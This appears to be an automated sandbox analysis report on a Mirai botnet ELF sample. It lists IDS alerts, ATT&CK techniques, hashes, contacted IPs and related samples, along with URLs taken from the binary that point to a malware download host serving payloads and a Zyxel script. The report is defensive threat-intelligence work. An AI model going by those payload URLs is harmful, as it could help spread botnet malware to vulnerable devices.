Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	Direct Volume Access	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	1 Service Stop	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	11 Non-Standard Port	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	4 Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Scheduled Transfer	3 Ingress Tool Transfer			Data Encrypted for Impact	Server	Gather Victim Network Information

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
F00D0B21M4.elf	65%	ReversingLabs	Linux.Trojan.Mirai
F00D0B21M4.elf	65%	Virustotal		Browse
F00D0B21M4.elf	100%	Avira	EXP/ELF.Mirai.Bootnet.Gen.o

Source	Detection	Scanner	Label
http://192.168.0.14:80/cgi-bin/ViewLog.asp	0%	Avira URL Cloud	safe
http://141.98.10.26/bins/x86	100%	Avira URL Cloud	malware
http://141.98.10.26/zyxel.sh;	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://192.168.0.14:80/cgi-bin/ViewLog.asp	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/soap/encoding/	F00D0B21M4.elf	false		high
http://141.98.10.26/zyxel.sh;	F00D0B21M4.elf	false	Avira URL Cloud: malware	unknown
http://141.98.10.26/bins/x86	F00D0B21M4.elf	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/soap/envelope/	F00D0B21M4.elf	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
85.251.57.42	unknown	Spain	12357	COMUNITELSPAINES	false
166.42.12.151	unknown	United States	3372	MCI-ASNUS	false
94.194.186.8	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	false
62.215.172.59	unknown	Kuwait	21050	FAST-TELCOKW	false
222.67.166.239	unknown	China	4812	CHINANET-SH-APChinaTelecomGroupCN	false
85.89.121.152	unknown	Russian Federation	5429	IIP-NET-AS5429RU	false
197.14.208.236	unknown	Tunisia	37703	ATLAXTN	false
85.83.15.254	unknown	Denmark	9158	TELENOR_DANMARK_ASDK	false
131.2.173.30	unknown	United States	61458	GOBIERNOAUTONOMOMUNICIPALDELAPAZBO	false
31.27.203.44	unknown	Italy	30722	VODAFONE-IT-ASNIT	false
62.118.118.96	unknown	Russian Federation	8359	MTSRU	false
62.195.46.159	unknown	Netherlands	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
171.147.195.99	unknown	United States	9874	STARHUB-MOBILEStarHubLtdSG	false
85.182.60.116	unknown	Germany	6805	TDDE-ASN1DE	false
88.177.214.182	unknown	France	12322	PROXADFR	false
94.63.104.23	unknown	Portugal	12353	VODAFONE-PTVodafonePortugalPT	false
85.14.7.234	unknown	Bulgaria	200533	INITLABBG	false
95.229.249.243	unknown	Italy	3269	ASN-IBSNAZIT	false
31.164.32.5	unknown	Switzerland	6730	SUNRISECH	false
191.120.173.82	unknown	Brazil	26615	TIMSABR	false
197.163.185.227	unknown	Egypt	24863	LINKdotNET-ASEG	false
112.125.213.26	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	true
85.21.71.17	unknown	Russian Federation	8402	CORBINA-ASOJSCVimpelcomRU	false
95.33.71.174	unknown	Germany	9145	EWETELCloppenburgerStrasse310DE	false
95.24.169.223	unknown	Russian Federation	8402	CORBINA-ASOJSCVimpelcomRU	false
31.41.10.14	unknown	Russian Federation	197658	LEVEL-NETRU	false
31.144.92.70	unknown	Ukraine	56515	OXYNET-ASPL	false
61.23.241.146	unknown	Japan	9824	JTCL-JP-ASJupiterTelecommunicationCoLtdJP	false
31.58.18.185	unknown	Iran (ISLAMIC Republic Of)	31549	RASANAIR	false
140.199.132.86	unknown	United States	26783	MARICOPA-COUNTY-COMMUNITY-COLLEGE-DISTRICTUS	false
41.82.47.201	unknown	Senegal	8346	SONATEL-ASAutonomousSystemEU	false
37.97.214.109	unknown	Netherlands	20857	TRANSIP-ASAmsterdamtheNetherlandsNL	false
94.71.14.153	unknown	Greece	6799	OTENET-GRAthens-GreeceGR	false
88.146.7.230	unknown	Czech Republic	29208	DIALTELECOM-ASDialTelecomasSK	false
147.112.146.79	unknown	Norway	766	REDIRISRedIRISAutonomousSystemES	false
85.108.147.63	unknown	Turkey	9121	TTNETTR	false
102.241.83.21	unknown	Tunisia	36926	CKL1-ASNKE	false
211.180.177.106	unknown	Korea Republic of	3786	LGDACOMLGDACOMCorporationKR	false
85.89.121.139	unknown	Russian Federation	5429	IIP-NET-AS5429RU	false
31.215.73.153	unknown	United Arab Emirates	5384	EMIRATES-INTERNETEmiratesInternetAE	false
197.76.213.128	unknown	South Africa	16637	MTNNS-ASZA	false
94.154.174.129	unknown	Germany	10753	LVLT-10753US	false
157.227.65.54	unknown	Australia	4704	SANNETRakutenMobileIncJP	false
31.38.6.186	unknown	France	5410	BOUYGTEL-ISPFR	false
31.193.14.92	unknown	United Kingdom	61323	UKFASTGB	false
31.199.207.76	unknown	Italy	3269	ASN-IBSNAZIT	false
95.51.135.115	unknown	Poland	5617	TPNETPL	false
31.121.171.203	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false
94.7.176.224	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	false
95.150.154.196	unknown	United Kingdom	12576	EELtdGB	false
95.81.253.241	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
94.85.218.75	unknown	Italy	3269	ASN-IBSNAZIT	false
95.217.252.229	unknown	Germany	24940	HETZNER-ASDE	false
62.91.213.246	unknown	Germany	20686	BISPINGISPCitycarrierGermanyDE	false
1.178.108.115	unknown	Australia	9723	ISEEK-AS-APiseekCommunicationsPtyLtdAU	false
41.165.243.17	unknown	South Africa	36937	Neotel-ASZA	false
72.125.110.11	unknown	United States	22394	CELLCOUS	false
96.143.199.254	unknown	United States	7922	COMCAST-7922US	false
62.53.240.227	unknown	Germany	6805	TDDE-ASN1DE	false
31.144.92.94	unknown	Ukraine	56515	OXYNET-ASPL	false
97.188.235.52	unknown	United States	6167	CELLCO-PARTUS	false
31.2.10.14	unknown	Poland	21243	PLUSNETPlusGSMtransitcorenetworkPL	false
31.139.107.246	unknown	Netherlands	15480	VFNL-ASVodafoneNLAutonomousSystemNL	false
95.6.137.16	unknown	Turkey	9121	TTNETTR	false
31.36.67.86	unknown	France	5410	BOUYGTEL-ISPFR	false
95.212.143.29	unknown	Syrian Arab Republic	29256	INT-PDN-STE-ASSTEPDNInternalASSY	false
41.9.179.7	unknown	South Africa	29975	VODACOM-ZA	false
59.39.195.252	unknown	China	134764	CT-FOSHAN-IDCCHINANETGuangdongprovincenetworkCN	false
59.166.150.178	unknown	Japan	9824	JTCL-JP-ASJupiterTelecommunicationCoLtdJP	false
31.115.246.57	unknown	United Kingdom	12576	EELtdGB	false
62.247.211.104	unknown	Sweden	702	UUNETUS	false
94.180.237.210	unknown	Russian Federation	41668	ERTH-KAZAN-ASRU	false
31.129.112.56	unknown	Norway	51069	ASDNEPRONETUA	false
88.104.99.41	unknown	United Kingdom	9105	TISCALI-UKTalkTalkCommunicationsLimitedGB	false
95.31.226.3	unknown	Russian Federation	3216	SOVAM-ASRU	false
164.176.184.12	unknown	United States	37717	EL-KhawarizmiTN	false
62.137.17.202	unknown	United Kingdom	12337	NORIS-NETWORKITServiceProviderlocatedinNuernbergGerm	false
94.63.104.77	unknown	Portugal	12353	VODAFONE-PTVodafonePortugalPT	false
31.179.155.89	unknown	Poland	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
94.78.205.70	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
87.254.244.167	unknown	Monaco	6758	AS6758MC	false
159.33.133.115	unknown	Canada	32563	ASN-SRCMTLCA	false
94.107.224.91	unknown	Belgium	47377	ORANGE_BELGIUM_SAKPNBelgiumBusinessNVhasbeenacquired	false
172.36.91.170	unknown	United States	21928	T-MOBILE-AS21928US	false
85.209.47.131	unknown	Ukraine	209825	IBNETUA	false
88.146.190.56	unknown	Czech Republic	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
62.81.143.56	unknown	Spain	6739	ONO-ASCableuropa-ONOES	false
182.124.107.248	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
18.183.164.32	unknown	United States	16509	AMAZON-02US	false
31.233.129.75	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
62.118.143.14	unknown	Russian Federation	62347	MTS_VNOVVelikiyNovgorodbranchRU	false
197.204.9.247	unknown	Algeria	36947	ALGTEL-ASDZ	false
31.70.134.113	unknown	United Kingdom	12576	EELtdGB	false
63.150.89.238	unknown	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	false
94.26.43.176	unknown	Bulgaria	48452	TRAFFIC-NETBG	false
94.84.106.242	unknown	Italy	3269	ASN-IBSNAZIT	false
95.212.143.83	unknown	Syrian Arab Republic	29256	INT-PDN-STE-ASSTEPDNInternalASSY	false
31.210.249.148	unknown	Sweden	35706	NAOSE	false
157.45.145.241	unknown	India	55836	RELIANCEJIO-INRelianceJioInfocommLimitedIN	false
82.200.68.128	unknown	Russian Federation	21127	ZSTTKASNovosibirskRussiaRU	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
94.194.186.8	4R66Cv0FvN	Get hash	malicious	Mirai	Browse
94.194.186.8	Rubify.m68k	Get hash	malicious	Mirai	Browse
62.215.172.59	praNYDGttC	Get hash	malicious	Mirai	Browse
	UnHAnaAW.x86	Get hash	malicious	Mirai	Browse
	JNuVQNwKoF	Get hash	malicious	Mirai	Browse
131.2.173.30	6jyBXsEpSh	Get hash	malicious	Mirai	Browse
31.27.203.44	Tsunami.arm	Get hash	malicious	Mirai	Browse
31.27.203.44	Tsunami.arm7	Get hash	malicious	Mirai	Browse
62.118.118.96	7iPTzt0DvB.elf	Get hash	malicious	Mirai	Browse
62.118.118.96	hWT9RJDotD	Get hash	malicious	Mirai	Browse
85.89.121.152	SN3tZLChOJ	Get hash	malicious	Mirai	Browse
85.89.121.152	aG1mulwSeH	Get hash	malicious	Mirai	Browse
62.195.46.159	V96ShTKH24	Get hash	malicious	Mirai	Browse
62.195.46.159	Q2tTXrOkpF	Get hash	malicious	Mirai	Browse
197.14.208.236	uYtea.x86	Get hash	malicious	Mirai	Browse
197.14.208.236	EV6lixv0HN	Get hash	malicious	Mirai	Browse
85.182.60.116	wxhbBu0SaO.elf	Get hash	malicious	Mirai	Browse
85.182.60.116	9hsK1l5dob	Get hash	malicious	Mirai	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BSKYB-BROADBAND-ASGB	XzViPfICKb.elf	Get hash	malicious	Mirai	Browse	94.15.196.74
	SIFex0dc75.elf	Get hash	malicious	Mirai	Browse	94.14.249.4
	x86.elf	Get hash	malicious	Mirai	Browse	176.25.81.118
	49WzaP1GI2.elf	Get hash	malicious	Mirai	Browse	151.231.176.169
	KYuuWAo3C1.elf	Get hash	malicious	Mirai	Browse	78.86.85.45
	2jtSIERpll.elf	Get hash	malicious	Mirai	Browse	2.216.173.188
	KEn1azvafI.elf	Get hash	malicious	Mirai	Browse	90.196.211.22
	0MNcEkBEXT.elf	Get hash	malicious	Mirai	Browse	90.196.1.51
	G1vp1p1HjW.elf	Get hash	malicious	Mirai	Browse	94.11.27.237
	sora.arm.elf	Get hash	malicious	Mirai	Browse	90.209.178.53
	0XslZyQiG0.elf	Get hash	malicious	Mirai	Browse	94.11.230.118
	VfMVlDMUYO.elf	Get hash	malicious	Mirai	Browse	2.123.4.54
	FzczI0Y6Dk.elf	Get hash	malicious	Mirai	Browse	90.211.32.73
	5MPcAq42ts.elf	Get hash	malicious	Mirai	Browse	94.194.198.162
	fAhViHnmQs.elf	Get hash	malicious	Mirai	Browse	94.194.73.238
	V5BX04OlfV.elf	Get hash	malicious	Mirai	Browse	94.11.230.114
	Eypxe2gysn.elf	Get hash	malicious	Mirai	Browse	151.230.186.251
	j5jq1GszFD.elf	Get hash	malicious	Mirai	Browse	2.120.158.30
	LFmvjDUsGs.elf	Get hash	malicious	Mirai	Browse	2.127.157.5
	enYTIDNSNe.elf	Get hash	malicious	Mirai	Browse	2.223.201.82
MCI-ASNUS	gvUvZ3t4MP.elf	Get hash	malicious	Mirai	Browse	165.122.182.107
	5M39t65C7q.elf	Get hash	malicious	Mirai	Browse	166.41.168.137
	skid.arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	166.45.79.202
	DCwGKAEFrZ.elf	Get hash	malicious	Mirai	Browse	142.77.63.144
	TqA3GrJsfl.elf	Get hash	malicious	Mirai	Browse	166.36.134.91
	skid.mpsl.elf	Get hash	malicious	Mirai, Moobot	Browse	166.35.245.120
	arm7.elf	Get hash	malicious	Mirai	Browse	166.60.191.185
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	166.50.136.67
	KY237QISTa.elf	Get hash	malicious	Mirai	Browse	159.99.31.21
	K99ngImkEb.elf	Get hash	malicious	Mirai, Moobot	Browse	166.56.253.201
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	166.43.147.73
	CEkLufWhly.elf	Get hash	malicious	Mirai	Browse	166.40.248.1
	3euWJJGI7C.elf	Get hash	malicious	Mirai	Browse	166.36.195.31
	ZfTI7n11nz.elf	Get hash	malicious	Mirai	Browse	166.58.89.206
	x86-20231016-0010.elf	Get hash	malicious	Mirai	Browse	166.42.12.139
	arm7-20231015-1817.elf	Get hash	malicious	Mirai	Browse	142.77.63.129
	tJ2s1v6tiU.elf	Get hash	malicious	Mirai, Moobot	Browse	166.56.211.47
	qWRPhfG8ma.elf	Get hash	malicious	Unknown	Browse	166.61.36.203
	FH8EJ7g2Sb.elf	Get hash	malicious	Mirai	Browse	166.42.58.80
	Wn1rSmUwvC.elf	Get hash	malicious	Mirai	Browse	166.44.220.145
COMUNITELSPAINES	gUuUJFJB45.elf	Get hash	malicious	Unknown	Browse	2.152.192.120
	5MPcAq42ts.elf	Get hash	malicious	Mirai	Browse	95.39.201.153
	fAhViHnmQs.elf	Get hash	malicious	Mirai	Browse	213.37.253.51
	enYTIDNSNe.elf	Get hash	malicious	Mirai	Browse	213.37.228.47
	skid.x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	85.155.237.228
	CzVyOvImBS.elf	Get hash	malicious	Mirai	Browse	213.37.253.44
	e74Xkt1ot5.elf	Get hash	malicious	Mirai, Moobot	Browse	84.122.127.138
	orange.exe	Get hash	malicious	Unknown	Browse	81.184.27.5
	Tt4pJQMhy8.elf	Get hash	malicious	Mirai	Browse	85.155.150.186
	5tuUOk0hKz.elf	Get hash	malicious	Mirai	Browse	85.251.82.43
	9Irkmiibym.elf	Get hash	malicious	Mirai	Browse	85.155.150.164
	x86.elf	Get hash	malicious	Mirai	Browse	85.251.82.23
	dmDgyJo66L.elf	Get hash	malicious	Mirai	Browse	85.136.26.130
	scorp.x86.elf	Get hash	malicious	Mirai	Browse	84.121.200.82
	7ry2TkWdG5.elf	Get hash	malicious	Unknown	Browse	217.217.10.187
	Bys8A4uK1O.elf	Get hash	malicious	Mirai	Browse	95.39.201.177
	lyAgxAj9Bm.elf	Get hash	malicious	Mirai	Browse	85.251.57.21
	m7MeI7tiks.elf	Get hash	malicious	Mirai	Browse	85.251.57.43
	u8GfSAgFEO.elf	Get hash	malicious	Gafgyt	Browse	217.217.217.217
	HFPhNWMpqK.elf	Get hash	malicious	Gafgyt	Browse	217.217.217.217

File type:	ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.366576720103085
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	F00D0B21M4.elf
File size:	75'920 bytes
MD5:	161c3c3e0205e1057ae14b4ce4604219
SHA1:	f2f8888a901fc3949455933762f58ff0b32fafd8
SHA256:	48e371bf5e4e9554a6a27007cd28b7f472baca0d4e26624cc1d092f7c0d29994
SHA512:	c3b40aa2e182376317a795004a56a7b9e5f18d18bb269fa6e3dbb621fe2d9a809204f1d46c6e5f2513ac0ab51d4a39fcce19f15f36411741746fa8084d545077
SSDEEP:	768:0ecNzmQtwZGB23gdj2a3tmRikohDvtAhOXuK8ohUJE3k7YrTer4VfOksp/:0Wi23gdiCp+K8ohnk7Yrar4V/8/
TLSH:	0A734CD9F4028E3CF98BD5BD94160E09BD2023D567970F27E6AAFDE36C731546A02E81
File Content Preview:	.ELF.......................D...4..'......4. ...(......................$...$....... .......$...D...D....(.......... .dt.Q............................NV..a....da.....N^NuNV..J9..F.f>"y..D. QJ.g.X.#...D.N."y..D. QJ.f.A.....J.g.Hy..$.N.X.......F.N^NuNV..N^NuN

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MC68000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x80000144
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	75520
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x80000094	0x94	0x14	0x0	0x6	AX	2
.text	PROGBITS	0x800000a8	0xa8	0x10caa	0x0	0x6	AX	4
.fini	PROGBITS	0x80010d52	0x10d52	0xe	0x0	0x6	AX	2
.rodata	PROGBITS	0x80010d60	0x10d60	0x1734	0x0	0x2	A	2
.ctors	PROGBITS	0x80014498	0x12498	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x800144a0	0x124a0	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x800144ac	0x124ac	0x214	0x0	0x3	WA	4
.bss	NOBITS	0x800146c0	0x126c0	0x2d8	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x126c0	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x80000000	0x80000000	0x12494	0x12494	6.3925	0x5	R E	0x2000	.init .text .fini .rodata
LOAD	0x12498	0x80014498	0x80014498	0x228	0x500	3.0688	0x6	RW	0x2000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.23112.49.9.22438270802839471 11/22/23-08:38:57.481125	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38270	80	192.168.2.23	112.49.9.224
192.168.2.2395.101.16.16559198802839471 11/22/23-08:38:58.795039	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59198	80	192.168.2.23	95.101.16.165
192.168.2.23112.126.163.19747042802839471 11/22/23-08:39:18.763055	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47042	80	192.168.2.23	112.126.163.197
192.168.2.2388.221.224.6159256802839471 11/22/23-08:38:32.852611	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59256	80	192.168.2.23	88.221.224.61
192.168.2.2388.198.112.25342492802839471 11/22/23-08:39:47.996437	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42492	80	192.168.2.23	88.198.112.253
192.168.2.23112.196.20.2035324802839471 11/22/23-08:40:30.988580	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35324	80	192.168.2.23	112.196.20.20
192.168.2.23112.164.250.9053900802839471 11/22/23-08:39:25.680414	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53900	80	192.168.2.23	112.164.250.90
192.168.2.2395.214.8.12850286802839471 11/22/23-08:39:06.529656	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50286	80	192.168.2.23	95.214.8.128
192.168.2.23112.126.167.3136540802839471 11/22/23-08:39:09.520578	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36540	80	192.168.2.23	112.126.167.31
192.168.2.23112.124.64.18137760802839471 11/22/23-08:38:20.072122	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37760	80	192.168.2.23	112.124.64.181
192.168.2.2388.248.50.23955656802839471 11/22/23-08:39:29.643542	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55656	80	192.168.2.23	88.248.50.239
192.168.2.2388.99.36.6460326802839471 11/22/23-08:38:26.460745	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60326	80	192.168.2.23	88.99.36.64
